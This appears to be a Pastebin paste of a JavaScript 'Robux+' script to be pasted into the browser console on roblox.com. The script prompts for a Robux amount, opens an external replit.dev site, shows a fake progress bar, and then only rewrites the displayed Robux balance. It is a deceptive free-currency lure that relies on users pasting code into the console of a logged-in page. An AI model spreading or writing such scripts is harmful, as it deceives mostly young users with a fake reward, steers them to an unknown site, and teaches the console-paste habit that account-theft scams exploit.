Advertisement
CaiqueONZ

Robux+

Feb 8th, 2024 (edited)
543
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 1.65 KB | Software | 1 1
  1. // Copy and paste this in console (https://www.roblox.com/)
  2. // Some variables
  3. const newText = document.createElement('a');
  4. const settings = document.getElementById('nav-settings');
  5.  
  6. // Automation
  7. settings.click();
  8.  
  9. // Set Variable content and create variable
  10. // newText.innerHTML = "<a class='rbx-menu-item' href='https://9db3c662-c110-40d7-bb08-0bed76af9160-00-3grd7y0de7xjw.riker.replit.dev/'>Thank you for using! Click me for more [Robux+ Letter]</a>";
  11. var requested = window.prompt('Please insert how many robux you want. (1-99999999999999999)');
  12.  
  13. window.open('https://9db3c662-c110-40d7-bb08-0bed76af9160-00-3grd7y0de7xjw.riker.replit.dev')
  14.  
  15. // Append newText to document
  16. document.body.appendChild(newText);
  17.  
  18. // Progress Bar section
  19. var bar = document.createElement('div');
  20. bar.innerHTML = "<div id='bar'></div>";
  21. bar.style.width = "100px"; // Adjust the width as needed
  22. bar.style.height = "20px"; // Adjust the height as needed
  23. bar.style.backgroundColor = "#f0f0f0"; // Background color
  24. bar.style.borderRadius = "10px"; // Rounded corners
  25. bar.style.position = "relative";
  26. bar.style.animation = "progress-animation 2s ease-in-out";
  27.  
  28. // Append bar to document
  29. document.body.appendChild(bar);
  30.  
  31. // Remove bar after animation completion
  32.  setTimeout(() => {
  33.      document.body.removeChild(bar);
  34.      const robux = document.getElementById('nav-robux-amount')
  35.      robux.innerText = `${requested}`
  36.  }, 2000);
  37.  
  38. // Keyframes for animation
  39. var styleSheet = document.styleSheets[0];
  40. styleSheet.insertRule(`@keyframes progress-animation {
  41.     0% {
  42.         width: 0%;
  43.     }
  44.     100% {
  45.         width: 100%;
  46.     }
  47. }`, styleSheet.cssRules.length);
  48.  
  49.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement